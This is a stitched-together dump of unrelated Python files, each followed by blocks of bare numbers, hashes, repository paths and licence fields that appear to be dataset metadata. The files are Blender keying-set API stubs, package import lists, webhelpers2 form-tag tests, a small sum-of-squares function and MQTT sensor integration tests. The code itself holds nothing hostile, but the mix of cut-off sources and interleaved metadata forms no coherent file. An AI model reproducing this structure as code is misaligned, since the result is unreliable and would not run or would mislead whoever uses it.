'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLoc(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocRotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualRotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualScaling(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_WholeCharacter(bpy_types.KeyingSetInfo):
badBonePrefixes = None
''' '''
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def addProp(self, ksi, ks, bone, prop, index, use_groups):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def doBBone(self, ksi, context, ks, pchan):
'''
'''
pass
def doCustomProps(self, ksi, ks, bone):
'''
'''
pass
def doLoc(self, ksi, ks, bone):
'''
'''
pass
def doRot3d(self, ksi, ks, bone):
'''
'''
pass
def doRot4d(self, ksi, ks, bone):
'''
'''
pass
def doScale(self, ksi, ks, bone):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, bone):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_WholeCharacterSelected(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def addProp(self, ksi, ks, bone, prop, index, use_groups):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def doBBone(self, ksi, context, ks, pchan):
'''
'''
pass
def doCustomProps(self, ksi, ks, bone):
'''
'''
pass
def doLoc(self, ksi, ks, bone):
'''
'''
pass
def doRot3d(self, ksi, ks, bone):
'''
'''
pass
def doRot4d(self, ksi, ks, bone):
'''
'''
pass
def doScale(self, ksi, ks, bone):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, bone):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
def register():
'''
'''
pass
def unregister():
'''
'''
pass
| 12.025852
| 66
| 0.374023
| 3,307
| 40,936
| 4.396432
| 0.027215
| 0.24025
| 0.318523
| 0.075108
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0
| 0.000192
| 0.49062
| 40,936
| 3,403
| 67
| 12.029386
| 0.697055
| 0
| 0
| 0.976357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.455342
| false
| 0.455342
| 0.002627
| 0
| 0.544658
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 12
|
593e96936ea686c85e41cacef1c035331ff7f710
| 180
|
py
|
Python
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 3
|
2022-01-12T06:51:51.000Z
|
2022-02-23T18:54:33.000Z
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 6
|
2021-08-31T19:21:26.000Z
|
2022-01-03T05:53:42.000Z
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 8
|
2021-08-12T08:07:49.000Z
|
2022-01-25T04:40:51.000Z
|
from . import loader
from . import model_all
from . import model_upload
from . import model_task
from . import model_publish
from . import model_list
from . import model_benchmark
| 22.5
| 29
| 0.805556
| 27
| 180
| 5.148148
| 0.37037
| 0.503597
| 0.647482
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 180
| 7
| 30
| 25.714286
| 0.914474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
59ab36eb3e1ecd63992f65d8f462a52ad7910c64
| 220
|
py
|
Python
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.wildcards.wild_z003_a_xsd.wild_z003_a import Elt1
from output.models.ms_data.wildcards.wild_z003_a_xsd.wild_z003_b import (
Ct,
Elem,
)
__all__ = [
"Elt1",
"Ct",
"Elem",
]
| 18.333333
| 76
| 0.704545
| 35
| 220
| 3.971429
| 0.457143
| 0.230216
| 0.194245
| 0.258993
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0
| 0.077348
| 0.177273
| 220
| 11
| 77
| 20
| 0.690608
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
59b98b34f9a3cf29d7e9d4b0f8b8edf64ce86b0d
| 9,568
|
py
|
Python
|
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
from webhelpers2.html import HTML
from webhelpers2.html.tags import *
from . import HTMLTestCase
class Holder(object):
def __init__(self, settings):
for k,v in settings.items():
setattr(self, k, v)
class TestModelTagsHelperWithObject(HTMLTestCase):
def setup_method(self, method):
obj = Holder({"name":"Jim", "phone":"123-456-7890", "fulltime":True, "fired":False, "password":"bacon", "longtext":"lorem ipsum lorem ipsum\n"*10, "favcolor":"blue", "lang":"en"})
self.m = ModelTags(obj)
def test_check_box(self):
b = '<input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" />'
assert self.m.checkbox("fulltime") == b
def test_hidden_field(self):
b = '<input id="name" name="name" type="hidden" value="Jim" />'
assert self.m.hidden("name") == b
def test_password_field(self):
b = '<input id="name" name="name" type="password" value="Jim" />'
assert self.m.password("name") == b
def test_file_field(self):
b = '<input id="name" name="name" type="file" value="Jim" />'
assert self.m.file("name") == b
def test_radio_button(self):
b = '<input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
assert self.m.radio("favcolor", "blue") == b
def test_radio_button2(self):
b = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
assert self.m.radio("favcolor", "red") == b
def test_text_area(self):
b = '<textarea id="longtext" name="longtext">lorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\n</textarea>'
assert self.m.textarea("longtext") == b
def test_text_field(self):
b = '<input id="name" name="name" type="text" value="Jim" />'
assert self.m.text("name") == b
def test_select(self):
a = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
b = '<select id="lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
assert a == b
class TestModelTagsHelperWithDict(TestModelTagsHelperWithObject):
def setup_method(self, method):
obj = {"name":"Jim", "phone":"123-456-7890", "fulltime":True, "fired":False, "password":"bacon", "longtext":"lorem ipsum lorem ipsum\n"*10, "favcolor":"blue", "lang":"en"}
self.m = ModelTags(obj, use_keys=True)
def test_check_box(self):
b = '<input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" />'
assert self.m.checkbox("fulltime") == b
def test_check_box_with_label_and_label_class(self):
a = self.m.checkbox("fulltime", label="Full Time", label_class="cl")
b = '<label class="cl"><input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" /> Full Time</label>'
self.check(a, b)
def test_hidden_field(self):
b = '<input id="name" name="name" type="hidden" value="Jim" />'
assert self.m.hidden("name") == b
def test_password_field(self):
b = '<input id="name" name="name" type="password" value="Jim" />'
assert self.m.password("name") == b
def test_file_field(self):
b = '<input id="name" name="name" type="file" value="Jim" />'
assert self.m.file("name") == b
def test_radio_button(self):
b = '<input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
assert self.m.radio("favcolor", "blue") == b
def test_radio_button2(self):
b = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
assert self.m.radio("favcolor", "red") == b
def test_radio_button_with_label_and_label_class(self):
a = self.m.radio("favcolor", "blue", label="Blue", label_class="cl")
b = '<label class="cl"><input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" /> Blue</label>'
self.check(a, b)
def test_text_area(self):
b = '<textarea id="longtext" name="longtext">lorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\n</textarea>'
assert self.m.textarea("longtext") == b
def test_text_field(self):
b = '<input id="name" name="name" type="text" value="Jim" />'
assert self.m.text("name") == b
def test_select(self):
a = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
b = '<select id="lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
assert a == b
class TestIdGeneration(object):
def check_id_format_syntax(self, id_format):
m = ModelTags(None, id_format=id_format)
a = {}
b = {"id": "person:foo"}
m._update_id("foo", a)
assert a == b
def test_braces_syntax(self):
self.check_id_format_syntax("person:{}")
def test_percent_syntax(self):
"""Backward compatibility with WebHelpers."""
self.check_id_format_syntax("person:%s")
class TestModelTagsHelperWithIdGeneration(TestModelTagsHelperWithObject):
def setup_method(self, method):
obj = Holder({"name":"Jim", "phone":"123-456-7890", "fulltime":True, "fired":False, "password":"bacon", "longtext":"lorem ipsum lorem ipsum\n"*10, "favcolor":"blue", "lang":"en"})
self.m = ModelTags(obj, id_format="person:%s")
def test_check_box(self):
b = '<input checked="checked" id="person:fulltime" name="fulltime" type="checkbox" value="1" />'
assert self.m.checkbox("fulltime") == b
def test_hidden_field(self):
b = '<input id="person:name" name="name" type="hidden" value="Jim" />'
assert self.m.hidden("name") == b
def test_password_field(self):
b = '<input id="person:name" name="name" type="password" value="Jim" />'
assert self.m.password("name") == b
def test_file_field(self):
b = '<input id="person:name" name="name" type="file" value="Jim" />'
assert self.m.file("name") == b
def test_radio_button(self):
b = '<input checked="checked" id="person:favcolor_blue" name="favcolor" type="radio" value="blue" />'
assert self.m.radio("favcolor", "blue") == b
def test_radio_button2(self):
b = '<input id="person:favcolor_red" name="favcolor" type="radio" value="red" />'
assert self.m.radio("favcolor", "red") == b
def test_text_area(self):
b = '<textarea id="person:longtext" name="longtext">lorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\n</textarea>'
assert self.m.textarea("longtext") == b
def test_text_field(self):
b = '<input id="person:name" name="name" type="text" value="Jim" />'
assert self.m.text("name") == b
def test_select(self):
a = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
b = '<select id="person:lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
assert a == b
class TestModelTagsHelperWithoutObject(object):
def setup_method(self, method):
obj = ""
self.m = ModelTags(obj)
def test_check_box(self):
b = '<input id="fulltime" name="fulltime" type="checkbox" value="1" />'
assert self.m.checkbox("fulltime") == b
def test_hidden_field(self):
b = '<input id="name" name="name" type="hidden" value="" />'
assert self.m.hidden("name") == b
def test_password_field(self):
b = '<input id="name" name="name" type="password" value="" />'
assert self.m.password("name") == b
def test_file_field(self):
b = '<input id="name" name="name" type="file" value="" />'
assert self.m.file("name") == b
def test_radio_button(self):
b = '<input id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
assert self.m.radio("favcolor", "blue") == b
def test_radio_button2(self):
b = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
assert self.m.radio("favcolor", "red") == b
def test_text_area(self):
b = '<textarea id="longtext" name="longtext"></textarea>'
assert self.m.textarea("longtext") == b
def test_text_field(self):
b = '<input id="name" name="name" type="text" value="" />'
assert self.m.text("name") == b
def test_select(self):
a = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
b = '<select id="lang" name="lang">\n<option value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
assert a == b
| 46.222222
| 322
| 0.624059
| 1,302
| 9,568
| 4.493088
| 0.078341
| 0.035897
| 0.047863
| 0.096923
| 0.897607
| 0.891795
| 0.877265
| 0.855556
| 0.855556
| 0.844615
| 0
| 0.006113
| 0.196488
| 9,568
| 206
| 323
| 46.446602
| 0.754813
| 0.004076
| 0
| 0.688312
| 0
| 0.12987
| 0.468445
| 0.069621
| 0
| 0
| 0
| 0
| 0.24026
| 1
| 0.298701
| false
| 0.097403
| 0.019481
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
59bdcfd75909452802e1c3a1f3f8003b69c4464c
| 108
|
py
|
Python
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | 1
|
2020-02-17T01:25:35.000Z
|
2020-02-17T01:25:35.000Z
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | 2
|
2021-03-31T19:32:47.000Z
|
2021-12-13T20:33:30.000Z
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | null | null | null |
def sum_of_nsqr(n):
return n * (n+1) * (2*n+1) // 6
print(sum_of_nsqr(10))
print(sum_of_nsqr(50))
| 18
| 36
| 0.592593
| 23
| 108
| 2.521739
| 0.521739
| 0.258621
| 0.465517
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.203704
| 108
| 5
| 37
| 21.6
| 0.581395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
59e3f83114734c03cffc38e15824adb94a84607f
| 2,543
|
py
|
Python
|
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | 1
|
2022-02-02T11:53:03.000Z
|
2022-02-02T11:53:03.000Z
|
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | null | null | null |
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | 4
|
2022-02-02T11:53:24.000Z
|
2022-02-05T21:57:13.000Z
|
import __init__
import pytest
import threading
import time
import paho.mqtt.client as mqtt_client
from sistem_climatizare.senzori_centralizare.basic_sensor import BasicSensor
from sistem_climatizare.senzori_centralizare.temperature_sensor import TemperatureSensor
from sistem_climatizare.senzori_centralizare.human_sensor import HumanSensor
test_passed = None
def test_sensor_outside_exists():
def my_callback(client, user, data):
global test_passed
test_passed = True
human_sensor = HumanSensor()
t = threading.Thread(target=human_sensor.loop_monitor)
t.start()
global test_passed
broker = 'localhost'
subscriber = mqtt_client.Client("test_sensor_outside")
subscriber.connect(broker)
test_passed = False
for i in range(10):
subscriber.loop_start()
subscriber.subscribe(BasicSensor.__name__ + "/Outside")
subscriber.on_message = my_callback
time.sleep(1)
subscriber.loop_stop()
if test_passed:
break
assert test_passed is True
human_sensor.stop()
def test_sensor_inside_exists():
def my_callback(client, user, data):
global test_passed
test_passed = True
human_sensor = HumanSensor()
t = threading.Thread(target=human_sensor.loop_monitor)
t.start()
global test_passed
broker = 'localhost'
subscriber = mqtt_client.Client("test_sensor_inside")
subscriber.connect(broker)
test_passed = False
for i in range(10):
subscriber.loop_start()
subscriber.subscribe(BasicSensor.__name__ + "/Inside")
subscriber.on_message = my_callback
time.sleep(1)
subscriber.loop_stop()
if test_passed:
break
assert test_passed is True
human_sensor.stop()
def test_sensor_temperature_exists():
def my_callback(client, user, data):
global test_passed
test_passed = True
temperature_sensor = TemperatureSensor(1, 5)
t = threading.Thread(target=temperature_sensor.loop_monitor)
t.start()
global test_passed
broker = 'localhost'
subscriber = mqtt_client.Client("test_sensor_temperature")
subscriber.connect(broker)
test_passed = False
for i in range(10):
subscriber.loop_start()
subscriber.subscribe(BasicSensor.__name__ + "/Temperature")
subscriber.on_message = my_callback
time.sleep(1)
subscriber.loop_stop()
if test_passed:
break
assert test_passed is True
temperature_sensor.stop()
| 28.573034
| 88
| 0.702713
| 299
| 2,543
| 5.675585
| 0.207358
| 0.111962
| 0.05657
| 0.049499
| 0.785504
| 0.714791
| 0.714791
| 0.714791
| 0.714791
| 0.714791
| 0
| 0.005564
| 0.222572
| 2,543
| 88
| 89
| 28.897727
| 0.852807
| 0
| 0
| 0.72
| 0
| 0
| 0.044829
| 0.009044
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.08
| false
| 0.253333
| 0.106667
| 0
| 0.186667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
